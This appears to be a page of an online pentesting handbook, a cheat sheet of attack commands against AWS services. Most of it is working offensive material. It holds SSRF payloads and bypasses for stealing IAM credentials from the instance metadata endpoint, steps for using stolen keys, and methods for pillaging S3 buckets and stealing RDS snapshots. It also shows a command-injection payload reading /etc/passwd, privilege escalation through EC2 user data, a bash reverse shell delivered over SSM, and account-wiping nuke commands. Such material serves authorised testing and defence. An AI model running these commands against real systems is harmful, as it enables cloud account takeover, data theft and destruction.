Pentest Book
Search…
Recon
Enumeration
Exploitation
AWS
AWS basic info
1
Auth methods:
2
• Programmatic access - Access + Secret Key
3
◇ Secret Access Key and Access Key ID for authenticating via scripts and CLI
4
• Management Console Access
5
◇ Web Portal Access to AWS
6
7
Recon:
8
• AWS Usage
9
◇ Some web applications may pull content directly from S3 buckets
10
◇ Look to see where web resources are being loaded from to determine if S3 buckets are being utilized
11
◇ Burp Suite
12
◇ Navigate application like you normally would and then check for any requests to:
13
▪ https://[bucketname].s3.amazonaws.com
14
▪ https://s3-[region].amazonaws.com/[OrgName]
15
16
S3:
17
• Amazon Simple Storage Service (S3)
18
◇ Storage service that is “secure by default”
19
◇ Configuration issues tend to unsecure buckets by making them publicly accessible
20
◇ Nslookup can help reveal region
21
◇ S3 URL Format:
22
▪ https://[bucketname].s3.amazonaws.com
23
▪ https://s3-[region].amazonaws.com/[Org Name]
24
# aws s3 ls s3://bucket-name-here --region
25
# aws s3api get-bucket-acl --bucket bucket-name-here
26
# aws s3 cp readme.txt s3://bucket-name-here --profile newuserprofile
27
28
EBS Volumes:
29
• Elastic Block Store (EBS)
30
• AWS virtual hard disks
31
• Can have similar issues to S3 being publicly available
32
• Difficult to target specific org but can find widespread leaks
33
34
EC2:
35
• Like virtual machines
36
• SSH keys created when started, RDP for Windows.
37
• Security groups to handle open ports and allowed IPs.
38
39
AWS Instance Metadata URL
40
• Cloud servers hosted on services like EC2 needed a way to orient themselves because of how dynamic they are
41
• A “Metadata” endpoint was created and hosted on a non-routable IP address at 169.254.169.254
42
• Can contain access/secret keys to AWS and IAM credentials
43
• This should only be reachable from the localhost
44
• Server compromise or SSRF vulnerabilities might allow remote attackers to reach it
45
• IAM credentials can be stored here:
46
◇ http://169.254.169.254/latest/meta-data/iam/security-credentials/
47
• Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS.
48
◇ curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo
49
• CapitalOne Hack
50
◇ Attacker exploited SSRF on EC2 server and accessed metadata URL to get IAM access keys. Then, used keys to dump S3 bucket containing 100 million individual’s data.
51
• AWS EC2 Instance Metadata service Version 2 (IMDSv2)
52
• Updated in November 2019 – Both v1 and v2 are available
53
• Supposed to defend the metadata service against SSRF and reverse proxy vulns
54
• Added session auth to requests
55
• First, a “PUT” request is sent and then responded to with a token
56
• Then, that token can be used to query data
57
--
58
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
59
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
60
curl http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
61
--
62
63
Post-compromise
64
• What do our access keys give us access to?
65
• Check AIO tools to do some recon (WeirdAAL- recon_module, PACU privesc,...)
66
67
http://169.254.169.254/latest/meta-data
68
http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>
69
70
# AWS nuke - remove all AWS services of our account
71
# https://github.com/rebuy-de/aws-nuke
72
- Fill nuke-config.yml with the output of aws sts get-caller-identity
73
./aws-nuke -c nuke-config.yml # Checks what will be removed
74
- If fails because there is no alias created
75
aws iam create-account-alias --account-alias unique-name
76
./aws-nuke -c nuke-config.yml --no-dry-run # Will perform delete operation
77
78
# Cloud Nuke
79
# https://github.com/gruntwork-io/cloud-nuke
80
cloud-nuke aws
81
82
# Other bypasses
83
1.
84
aws eks list-clusters | jq -rc '.clusters'
85
["example"]
86
aws eks update-kubeconfig --name example
87
kubectl get secrets
88
89
2. SSRF AWS Bypasses to access metadata endpoint.
90
Converted Decimal IP: http://2852039166/latest/meta-data/
91
IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
92
IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
93
94
# Interesting metadata instance urls:
95
http://instance-data
96
http://169.254.169.254
97
http://169.254.169.254/latest/user-data
98
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
99
http://169.254.169.254/latest/meta-data/
100
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
101
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
102
http://169.254.169.254/latest/meta-data/ami-id
103
http://169.254.169.254/latest/meta-data/reservation-id
104
http://169.254.169.254/latest/meta-data/hostname
105
http://169.254.169.254/latest/meta-data/public-keys/
106
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
107
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
108
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
109
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
110
http://169.254.169.254/latest/dynamic/instance-identity/document
Copied!
Find AWS in domain/company
1
# Find subdomains
2
3
./sub.sh -s example.com
4
assetfinder example.com
5
## Bruteforcing
6
python3 dnsrecon.py -d example.com -D subdomains-top1mil-5000.txt -t brt
7
8
# Reverse DNS lookups
9
host subdomain.domain.com
10
host IP
11
12
# Bucket finders
13
python3 cloud_enum.py -k example.com
14
ruby lazys3.rb companyname
15
# https://github.com/bbb31/slurp
16
slurp domain -t example.com
Copied!
AIO AWS tools
1
# https://github.com/carnal0wnage/weirdAAL
2
pip3 install -r requirements
3
cp env.sample .env
4
vim .env
5
python3 weirdAAL.py -l
6
7
# https://github.com/RhinoSecurityLabs/pacu
8
bash install.sh
9
python3 pacu.py
10
import_keys --all
11
ls
12
13
# https://github.com/dagrz/aws_pwn
14
# Lot of scripts for different purposes, check github
15
16
# IAM resources finder
17
# https://github.com/BishopFox/smogcloud
18
smogcloud
19
20
# Red team scripts for AWS
21
# https://github.com/elitest/Redboto
22
23
# AWS Bloodhound
24
# https://github.com/lyft/cartography
25
26
# AWS Exploitation Framework
27
# https://github.com/grines/scour
Copied!
S3
Basic Commands
1
aws s3 ls s3://
2
aws s3api list-buckets
3
aws s3 ls s3://bucket.com
4
aws s3 ls --recursive s3://bucket.com
5
aws s3 sync s3://bucketname s3-files-dir
6
aws s3 cp s3://bucket-name/<file> <destination>
7
aws s3 cp/mv test-file.txt s3://bucket-name
8
aws s3 rm s3://bucket-name/test-file.txt
9
aws s3api get-bucket-acl --bucket bucket-name # Check owner
10
aws s3api head-object --bucket bucket-name --key file.txt # Check file metadata
Copied!
Find S3 buckets
1
# Find buckets from keyword or company name
2
# https://github.com/nahamsec/lazys3
3
ruby lazys3.rb companyname
4
5
# https://github.com/initstring/cloud_enum
6
python3 cloud_enum.py -k companynameorkeyword
7
8
# https://github.com/gwen001/s3-buckets-finder
9
php s3-buckets-bruteforcer.php --bucket gwen001-test002
10
11
# Public s3 buckets
12
https://buckets.grayhatwarfare.com
13
https://github.com/eth0izzle/bucket-stream
14
15
# https://github.com/cr0hn/festin
16
festin mydomain.com
17
festin -f domains.txt
18
19
# Google dork
20
site:.s3.amazonaws.com "Company"
Copied!
Check S3 buckets perms and files
1
# https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets
2
alias flumberbuckets='sudo python3 PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p'
3
echo "bucket" | flumberbuckets -si -
4
cat hosts.txt | flumberbuckets -si -
5
6
# https://github.com/sa7mon/S3Scanner
7
sudo python3 s3scanner.py sites.txt
8
sudo python ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
9
10
# https://github.com/clario-tech/s3-inspector
11
python s3inspector.py
12
13
# https://github.com/jordanpotti/AWSBucketDump
14
source /home/cloudhacker/tools/AWSBucketDump/bin/activate
15
touch s.txt
16
sed -i "s,$,-$bapname-awscloudsec,g" /home/cloudhacker/tools/AWSBucketDump/BucketNames.txt
17
python AWSBucketDump.py -D -l BucketNames.txt -g s.txt
18
19
# https://github.com/Ucnt/aws-s3-data-finder/
20
python3 find_data.py -n bucketname -u
21
22
# https://github.com/VirtueSecurity/aws-extender-cli
23
python3 aws_extender_cli.py -s S3 -b flaws.cloud
Copied!
S3 examples attacks
1
# S3 Bucket Pillaging
2
3
• GOAL: Locate Amazon S3 buckets and search them for interesting data
4
• In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list out the contents of it and download the files hosted there.
5
6
~$ sudo apt-get install python3-pip
7
~$ git clone https://github.com/RhinoSecurityLabs/pacu
8
~$ cd pacu
9
~$ sudo bash install.sh
10
~$ sudo aws configure
11
~$ sudo python3 pacu.py
12
13
Pacu > import_keys --all
14
# Search by domain
15
Pacu > run s3__bucket_finder -d glitchcloud
16
# List files in bucket
17
Pacu > aws s3 ls s3://glitchcloud
18
# Download files
19
Pacu > aws s3 sync s3://glitchcloud s3-files-dir
20
21
# S3 Code Injection
22
• Backdoor JavaScript in S3 Buckets used by webapps
23
• In March, 2018 a crypto-miner malware was found to be loading on MSN’s homepage
24
• This was due to AOL’s advertising platform having a writeable S3 bucket, which was being served by MSN
25
• If a webapp is loading content from an S3 bucket made publicly writeable attackers can upload malicious JS to get executed by visitors
26
• Can perform XSS-type attacks against webapp visitors
27
• Hook browser with Beef
28
29
# Domain Hijacking
30
• Hijack S3 domain by finding references in a webapp to S3 buckets that don’t exist anymore
31
• Or… subdomains that were linked to an S3 bucket with CNAME’s that still exist
32
• When assessing webapps look for 404’s to *.s3.amazonaws.com
33
• When brute forcing subdomains for an org look for 404’s with ‘NoSuchBucket’ error
34
• Go create the S3 bucket with the same name and region
35
• Load malicious content to the new S3 bucket that will be executed when visitors hit the site
Copied!
Enumerate read access buckets script
1
#!/bin/bash
2
for i in "[email protected]" ; do
3
if [[ $i == "--profile" ]] ; then
4
profile=$(echo "[email protected]" | awk '{for(i=1;i<=NF;i++) if ($i=="--profile") print $(i+1)}')
5
AWS_ACCESS_KEY_ID=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | head -n 1)
6
AWS_SECRET_ACCESS_KEY=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | tail -n 1)
7
break
8
fi
9
done
10
echo "Enumerating the buckets..."
11
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets
12
echo "You can read the following buckets:"
13
>/tmp/readBuckets
14
for i in $(cat /tmp/buckets); do
15
result=$(aws --profile "$profile" s3 ls s3://"$i" 2>/dev/null | head -n 1)
16
if [ ! -z "$result" ]; then
17
echo "$i" | tee /tmp/readBuckets
18
unset result
19
fi
20
done
Copied!
IAM
Basic commands
1
# ~/.aws/credentials
2
[default]
3
aws_access_key_id = XXX
4
aws_secret_access_key = XXXX
5
6
export AWS_ACCESS_KEY_ID=
7
export AWS_SECRET_ACCESS_KEY=
8
export AWS_DEFAULT_REGION=
9
10
# Check valid
11
aws sts get-caller-identity
12
aws sdb list-domains --region us-east-1
13
14
# If we can steal AWS credentials, add to your configuration
15
aws configure --profile stolen
16
# Open ~/.aws/credentials
17
# Under the [stolen] section add aws_session_token and add the discovered token value here
18
aws sts get-caller-identity --profile stolen
19
20
# Get account id
21
aws sts get-access-key-info --access-key-id=ASIA1234567890123456
22
23
aws iam get-account-password-policy
24
aws sts get-session-token
25
aws iam list-users
26
aws iam list-roles
27
aws iam list-access-keys --user-name <username>
28
aws iam create-access-key --user-name <username>
29
aws iam list-attached-user-policies --user-name XXXX
30
aws iam get-policy
31
aws iam get-policy-version
32
33
aws deploy list-applications
34
35
aws directconnect describe-connections
36
37
aws secretsmanager get-secret-value --secret-id <value> --profile <container tokens>
38
39
aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa
40
41
# IAM Prefix meaning
42
ABIA - AWS STS service bearer token
43
ACCA - Context-specific credential
44
AGPA - Group
45
AIDA - IAM user
46
AIPA - Amazon EC2 instance profile
47
AKIA - Access key
48
ANPA - Managed policy
49
ANVA - Version in a managed policy
50
APKA - Public key
51
AROA - Role
52
ASCA - Certificate
53
ASIA - Temporary (AWS STS) access key IDs use this prefix, but are unique only in combination with the secret access key and the session token.
Copied!
Tools
1
# https://github.com/andresriancho/enumerate-iam
2
python enumerate-iam.py --access-key XXXXXXXXXXXXX --secret-key XXXXXXXXXXX
3
python enumerate-iam.py --access-key "ACCESSKEY" --secret-key "SECRETKEY" (--session-token "$AWS_SESSION_TOKEN")
4
5
# https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
6
python aws_escalate.py
7
8
# https://github.com/andresriancho/nimbostratus
9
python2 nimbostratus dump-permissions
10
11
# https://github.com/nccgroup/ScoutSuite
12
python3 scout.py aws
13
14
# https://github.com/salesforce/cloudsplaining
15
cloudsplaining download
16
cloudsplaining scan
17
18
# Enumerate IAM permissions without logging (stealth mode)
19
# https://github.com/Frichetten/aws_stealth_perm_enum
20
21
# Unauthenticated (only account id) Enumeration of IAM Users and Roles
22
# https://github.com/Frichetten/enumate_iam_using_bucket_policy
23
24
# AWS Consoler
25
# https://github.com/NetSPI/aws_consoler
26
# Generate link to console from valid credentials
27
aws_consoler -a ASIAXXXX -s SECRETXXXX -t TOKENXXXX
28
29
# AWSRoleJuggler
30
# https://github.com/hotnops/AWSRoleJuggler/
31
# You can use one assumed role to assume another one
32
./find_circular_trust.py
33
python aws_role_juggler.py -r arn:aws:iam::123456789:role/BuildRole arn:aws:iam::123456789:role/GitRole arn:aws:iam::123456789:role/ArtiRole
34
35
# https://github.com/prisma-cloud/IAMFinder
36
python3 iamfinder.py init
37
python3 iamfinder.py enum_user --aws_id 123456789012
38
39
# https://github.com/nccgroup/PMapper
40
# Check IAM permissions
Copied!
AWS IAM Cli Enumeration
1
# First of all, set your profile
2
aws configure --profile test
3
set profile=test # Just for convenience
4
5
# Get policies available
6
aws --profile "$profile" iam list-policies | jq -r ".Policies[].Arn"
7
# Get specific policy version
8
aws --profile "$profile" iam get-policy --policy-arn "$i" --query "Policy.DefaultVersionId" --output text
9
# Get all juicy info oneliner (search for Action/Resource */*)
10
profile="test"; for i in $(aws --profile "$profile" iam list-policies | jq -r '.Policies[].Arn'); do echo "Describing policy $i" && aws --profile "$profile" iam get-policy-version --policy-arn "$i" --version-id $(aws --profile "$profile" iam get-policy --policy-arn "$i" --query 'Policy.DefaultVersionId' --output text); done | tee /tmp/policies.log
11
12
#List Managed User policies
13
aws --profile "test" iam list-attached-user-policies --user-name "test-user"
14
#List Managed Group policies
15
aws --profile "test" iam list-attached-group-policies --group-name "test-group"
16
#List Managed Role policies
17
aws --profile "test" iam list-attached-role-policies --role-name "test-role"
18
19
#List Inline User policies
20
aws --profile "test" iam list-user-policies --user-name "test-user"
21
#List Inline Group policies
22
aws --profile "test" iam list-group-policies --group-name "test-group"
23
#List Inline Role policies
24
aws --profile "test" iam list-role-policies --role-name "test-role"
25
26
#Describe Inline User policies
27
aws --profile "test" iam get-user-policy --user-name "test-user" --policy-name "test-policy"
28
#Describe Inline Group policies
29
aws --profile "test" iam get-group-policy --group-name "test-group" --policy-name "test-policy"
30
#Describe Inline Role policies
31
aws --profile "test" iam get-role-policy --role-name "test-role" --policy-name "test-policy"
32
33
# List roles policies
34
aws --profile "test" iam get-role --role-name "test-role"
35
36
# Assume role from any ec2 instance (get Admin)
37
# Create instance profile
38
aws iam create-instance-profile --instance-profile-name YourNewRole-Instance-Profile
39
# Associate role to Instance Profile
40
aws iam add-role-to-instance-profile --role-name YourNewRole --instance-profile-name YourNewRole-Instance-Profile
41
# Associate Instance Profile with instance you want to use
42
aws ec2 associate-iam-instance-profile --instance-id YourInstanceId --iam-instance-profile Name=YourNewRole-Instance-Profile
43
44
# Get assumed roles in instance
45
aws --profile test sts get-caller-identity
46
47
# Shadow admin
48
aws iam list-attached-user-policies --user-name {}
49
aws iam get-policy-version --policy-arn provide_policy_arn --version-id $(aws iam get-policy --policy-arn provide_policy_arn --query 'Policy.DefaultVersionId' --output text)
50
aws iam list-user-policies --user-name {}
51
aws iam get-user-policy --policy-name policy_name_from_above_command --user-name {} | python -m json.tool
52
# Vulnerables policies:
53
iam:CreatUser
54
iam:CreateLoginProfile
55
iam:UpdateProfile
56
iam:AddUserToGroup
Copied!
EBS
Find secrets in public EBS
1
# Dufflebag https://github.com/bishopfox/dufflebag
Copied!
EBS attack example
1
# Discover EBS Snapshot and mount it to navigate
2
- Obtaning public snapshot name
3
aws ec2 describe-snapshots --region us-east-1 --restorable-by-user-ids all | grep -C 10 "company secrets"
4
- Obtaining zone and instance
5
aws ec2 describe-instances --filters Name=tag:Name,Values=attacker-machine
6
- Create a new volume of it
7
aws ec2 create-volume --snapshot-id snap-03616657ede4b9862 --availability-zone <ZONE-HERE>
8
- Attach to an EC2 instance
9
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>
10
- It takes some time, to see the status:
11
aws ec2 describe-volumes --filters Name=volume-id,Values=<VOLUME-ID>
12
- Once is mounted in EC2 instance, check it, mount it and access it:
13
sudo lsblk
14
sudo mount /dev/xvdh1 /mnt
15
cd /mnt/home/user/companydata
Copied!
1
# WeirdAAL https://github.com/carnal0wnage/weirdAAL
Copied!
EC2
EC2 basic commands
1
# Like traditional host
2
- Port enumeration
3
- Attack interesting services like ssh or rdp
4
5
aws ec2 describe-instances
6
aws ssm describe-instance-information
7
aws ec2 describe-snapshots
8
aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>
9
aws ec2 create-volume --snapshot-id snap-123123123
10
aws ec2 describe-snapshots --owner-ids {user-id}
11
12
# SSH into created instance:
13
ssh -i ".ssh/key.pem" <user>@<instance-ip>
14
sudo mount /dev/xvdb1 /mnt
15
cat /mnt/home/ubuntu/setupNginx.sh
16
17
# EC2 security group
18
aws ec2 describe-security-groups
19
aws ec2 describe-security-groups --filters Name=ip-permission.cidr,Values='0.0.0.0/0' --query "SecurityGroups[*].[GroupName]" --output text
Copied!
EC2 example attacks
1
# SSRF to http://169.254.169.254 (Metadata server)
2
curl http://<ec2-ip-address>/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/
3
http://169.254.169.254/latest/meta-data
4
http://169.254.169.254/latest/meta-data/ami-id
5
http://169.254.169.254/latest/meta-data/public-hostname
6
http://169.254.169.254/latest/meta-data/public-keys/
7
http://169.254.169.254/latest/meta-data/network/interfaces/
8
http://169.254.169.254/latest/meta-data/local-ipv4
9
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key/
10
http://169.254.169.254/latest/user-data
11
12
# Find IAM Security Credentials
13
http://169.254.169.254/latest/meta-data/
14
http://169.254.169.254/latest/meta-data/iam/
15
http://169.254.169.254/latest/meta-data/iam/security-credentials/
16
17
# Using EC2 instance metadata tool
18
ec2-metadata -h
19
# With EC2 Instance Meta Data Service version 2 (IMDSv2):
20
Append X-aws-ec2-metadata-token Header generated with a PUT request to http://169.254.169.254/latest/api/token
21
22
# Check directly for metadata instance
23
curl -s http://<ec2-ip-address>/latest/meta-data/ -H 'Host:169.254.169.254'
24
25
# EC2 instance connect
26
aws ec2 describe-instances | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
27
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE_WE_GOT_PREVIOUSLY --availability-zone zone --instance-os-user ubuntu --ssh-public-key file://shortkey.pub
28
29
# EC2 AMI - Read instance, create AMI for instance and run
30
aws ec2 describe-images --region specific-region
31
aws ec2 create-image --instance-id ID --name "EXPLOIT" --description "Export AMI" --region specific-region
32
aws ec2 import-key-pair --key-name "EXPLOIT" --public-key-material fileb:///publickeyfile
33
aws ec2 describe-images --filters "Name=name,Values=EXPLOIT"
34
aws ec2 run-instances --image-id {} --security-group-ids "" --subnet-id {} --count 1 --instance-type t2.micro --key-name EXPLOIT
35
36
# Create volume from snapshot & attach to instance id && mount in local
37
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
38
aws ec2 attach-volume --volume-id above-volume-id --instance-id instance-id --device /dev/sdf
39
40
# Privesc with modify-instance-attribute
41
aws ec2 modify-instance-attribute --instance-id=xxx --attribute userData --value file://file.b64.txt
42
file.b64.txt contains (and after base64 file.txt > file.b64.txt):
43
```
44
Content-Type: multipart/mixed; boundary="//"
45
MIME-Version: 1.0
46
47
--//
48
Content-Type: text/cloud-config; charset="us-ascii"
49
MIME-Version: 1.0
50
Content-Transfer-Encoding: 7bit
51
Content-Disposition: attachment; filename="cloud-config.txt"
52
53
#cloud-config
54
cloud_final_modules:
55
- [scripts-user, always]
56
57
--//
58
Content-Type: text/x-shellscript; charset="us-ascii"
59
MIME-Version: 1.0
60
Content-Transfer-Encoding: 7bit
61
Content-Disposition: attachment; filename="userdata.txt"
62
63
#!/bin/bash
64
**commands here** (reverse shell, set ssh keys...)
65
--//
66
```
67
68
# Privesc 2 with user data
69
# On first launch, the EC2 instance will pull the start_script from S3 and will run it. If an adversary can write to that location, they can escalate privileges or gain control of the EC2 instance.
70
#!/bin/bash
71
aws s3 cp s3://example-boot-bucket/start_script.sh /root/start_script.sh
72
chmod +x /root/start_script.sh
73
/root/start_script.sh
Copied!
Tools
1
# EC2 Shadow Copy attack
2
# https://github.com/Static-Flow/CloudCopy
3
4
# EC2 secrets recovery
5
# https://github.com/akhil-reni/ud-peep
Copied!
Cloudfront
Info
1
Cloudfront is a CDN and it checks the HOST header in CNAMES, so:
2
- The domain "test.disloops.com" is a CNAME record that points to "disloops.com".
3
- The "disloops.com" domain is set up to use a CloudFront distribution.
4
- Because "test.disloops.com" was not added to the "Alternate Domain Names (CNAMEs)" field for the distribution, requests to "test.disloops.com" will fail.
5
- Another user can create a CloudFront distribution and add "test.disloops.com" to the "Alternate Domain Names (CNAMEs)" field to hijack the domain.
Copied!
Tools
1
# https://github.com/MindPointGroup/cloudfrunt
2
git clone --recursive https://github.com/MindPointGroup/cloudfrunt
3
pip install -r requirements.txt
4
python cloudfrunt.py -o cloudfrunt.com.s3-website-us-east-1.amazonaws.com -i S3-cloudfrunt -l list.txt
Copied!
AWS Lambda
Info
1
# Welcome to serverless!!!!
2
# AWS Lambda, essentially are short lived servers that run your function and provide you with output that can be then used in other applications or consumed by other endpoints.
3
4
# OS command Injection in Lambda
5
curl "https://API-endpoint/api/stringhere"
6
7
# For a md5 converter endpoint "https://API-endpoint/api/hello;id;w;cat%20%2fetc%2fpasswd"
8
aws lambda list-functions
9
aws lambda get-function --function-name <FUNCTION-NAME>
10
aws lambda get-policy
11
aws apigateway get-stages
12
13
# Download function code
14
aws lambda list-functions
15
aws lambda get-function --function-name name_we_retrieved_from_above --query 'Code.Location'
16
wget -O myfunction.zip URL_from_above_step
17
18
# Steal creds via XXE or SSRF reading:
19
/proc/self/environ
20
# If blocked try to read other vars:
21
/proc/[1..20]/environ
Copied!
Tools
1
# https://github.com/puresec/lambda-proxy
2
# SQLMap to Lambda!!!
3
python3 main.py
4
sqlmap -r request.txt
5
6
# https://github.com/twistlock/splash
7
# Pseudo Lambda Shell
8
Copied!
AWS Inspector
1
# Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.
Copied!
AWS RDS
Basic
1
aws rds describe-db-instances
Copied!
Attacks
1
# Just like a MySQL, try for sqli!
2
# Check if 3306 is exposed
3
# Sqlmap is your friend ;)
4
5
# Stealing RDS Snapshots
6
- Searching partial snapshots
7
aws rds describe-db-snapshots --include-public --snapshot-type public --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup
8
- Restore in instance
9
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup --availability-zone us-east-1b
10
- Once restored, try to access
11
aws rds describe-db-instances --db-instance-identifier recoverdb
12
- Reset the master credentials
13
aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately
14
- Takes some time, you can check the status:
15
aws rds describe-db-instances
16
- Try to access it from EC2 instance which was restored
17
nc rds-endpoint 3306 -zvv
18
- If you can't see, you may open 3306:
19
- In RDS console, click on the recoverdb instance
20
- Click on the Security Group
21
- Add an Inbound rule for port 3306 TCP for Cloudhacker IP
22
- Then connect it
23
mysql -u <username> -p -h <rds-instance-endpoint>
24
Copied!
ECR
Info
1
Amazon Elastic Container Registry - Docker container registry
2
aws ecr get-login
3
aws ecr get-login-password | docker login --username AWS --password-stdin XXXXXXXXX.dkr.ecr.eu-west-1.amazonaws.com/some-registry && docker pull XXXXXXXX.dkr.ecr.eu-west-1.amazonaws.com/docker-test:latest && docker inspect docker-test
4
aws ecr list-images --repository-name REPO_NAME --registry-id ACCOUNT_ID
5
aws ecr batch-get-image --repository-name XXXX --registry-id XXXX --image-ids imageTag=latest
6
aws ecr get-download-url-for-layer --repository-name XXXX --registry-id XXXX --layer-digest "sha256:XXXXX"
7
Copied!
Tools
1
# After AWS credentials compromised
2
3
# https://github.com/RhinoSecurityLabs/ccat
4
docker run -it -v ~/.aws:/root/.aws/ -v /var/run/docker.sock:/var/run/docker.sock -v ${PWD}:/app/ rhinosecuritylabs/ccat:latest
Copied!
ECS
Info
1
ECS - Elastic Container Service (is a container orchestration service)
Copied!
AWS Cognito API
Amazon Cognito is a user identity and data synchronization service. If the website uses other AWS services (like Amazon S3, Amazon Dynamo DB, etc.) Amazon Cognito provides you with delivering temporary credentials with limited privileges that users can use to access database resources.
1
# Check for cognito-identity requests with GetCredentialsForIdentity
Copied!
AWS Systems Manager
1
# AWS SSM
2
- The agent must be installed in the machines
3
- It's used to create roles and policies
4
5
# Executing commands
6
aws ssm describe-instance-information #Get instance
7
aws ssm describe-instance-information --output text --query "InstanceInformationList[*]"
8
- Get "ifconfig" commandId
9
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP config" --parameters commands=ifconfig --output text --query "Command.CommandId"
10
- Execute CommandID generated for ifconfig
11
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}"
12
13
# RCE
14
aws ssm send-command --document-name "AWS-RunShellScript" --comment "RCE test: whoami" --targets "Key=instanceids,Values=[instanceid]" --parameters 'commands=whoami'
15
aws ssm list-command-invocations --command-id "[CommandId]" --details
16
17
# Getting shell
18
- You already need to have reverse.sh uploaded to s3
19
#!/bin/bash
20
bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1
21
- Start your listener
22
aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL-SCRIPT\"}"],"commandLine":["/bin/bash NAME-OF-SHELL-SCRIPT"]}' --query "Command.CommandId"
23
24
# Read info from SSM
25
aws ssm describe-parameters
26
aws ssm get-parameters --name <NameYouFindAbove>
27
28
# EC2 with SSM enabled leads to RCE
29
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
30
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
Copied!
Aws Services Summary
AWS Service
Should have been called
Use this to
It's like
EC2
Amazon Virtual Servers
Host the bits of things you think of as a computer.
It's handwavy, but EC2 instances are similar to the virtual private servers you'd get at Linode, DigitalOcean or Rackspace.
IAM
Users, Keys and Certs
Set up additional users, set up new AWS Keys and policies.
S3
Amazon Unlimited FTP Server
Store images and other assets for websites. Keep backups and share files between services. Host static websites. Also, many of the other AWS services write and read from S3.
VPC
Amazon Virtual Colocated Rack
Overcome objections that "all our stuff is on the internet!" by adding an additional layer of security. Makes it appear as if all of your AWS services are on the same little network instead of being small pieces in a much bigger network.
If you're familar with networking: VLANs
Lambda
AWS App Scripts
Run little self contained snippets of JS, Java or Python to do discrete tasks. Sort of a combination of a queue and execution in one. Used for storing and then executing changes to your AWS setup or responding to events in S3 or DynamoDB.
API Gateway
API Proxy
Proxy your apps API through this so you can throttle bad client traffic, test new versions, and present methods more cleanly.
3Scale
RDS
Amazon SQL
Be your app's Mysql, Postgres, and Oracle database.
Heroku Postgres
Route53
Amazon DNS + Domains
Buy a new domain and set up the DNS records for that domain.
DNSimple, GoDaddy, Gandi
SES
Amazon Transactional Email
Send one-off emails like password resets, notifications, etc. You could use it to send a newsletter if you wrote all the code, but that's not a great idea.
SendGrid, Mandrill, Postmark
Cloudfront
Amazon CDN
Make your websites load faster by spreading out static file delivery to be closer to where your users are.
MaxCDN, Akamai
CloudSearch
Amazon Fulltext Search
Pull in data on S3 or in RDS and then search it for every instance of 'Jimmy.'
Sphinx, Solr, ElasticSearch
DynamoDB
Amazon NoSQL
Be your app's massively scalable key valueish store.
MongoLab
Elasticache
Amazon Memcached
Be your app's Memcached or Redis.
Redis to Go, Memcachier
Elastic Transcoder
Amazon Beginning Cut Pro
Deal with video weirdness (change formats, compress, etc.).
SQS
Amazon Queue
Store data for future processing in a queue. The lingo for this is storing "messages" but it doesn't have anything to do with email or SMS. SQS doesn't have any logic, it's just a place to put things and take things out.
RabbitMQ, Sidekiq
WAF
AWS Firewall
Block bad requests to Cloudfront protected sites (aka stop people trying 10,000 passwords against /wp-admin)
Sophos, Kapersky
Cognito
Amazon OAuth as a Service
Give end users - (non AWS) - the ability to log in with Google, Facebook, etc.
OAuth.io
Device Farm
Amazon Drawer of Old Android Devices
Test your app on a bunch of different IOS and Android devices simultaneously.
MobileTest, iOS emulator
Mobile Analytics
Spot on Name, Amazon Product Managers take note
Track what people are doing inside of your app.
Flurry
AWS vs AD
Last modified 10mo ago
Export as PDF
Copy link
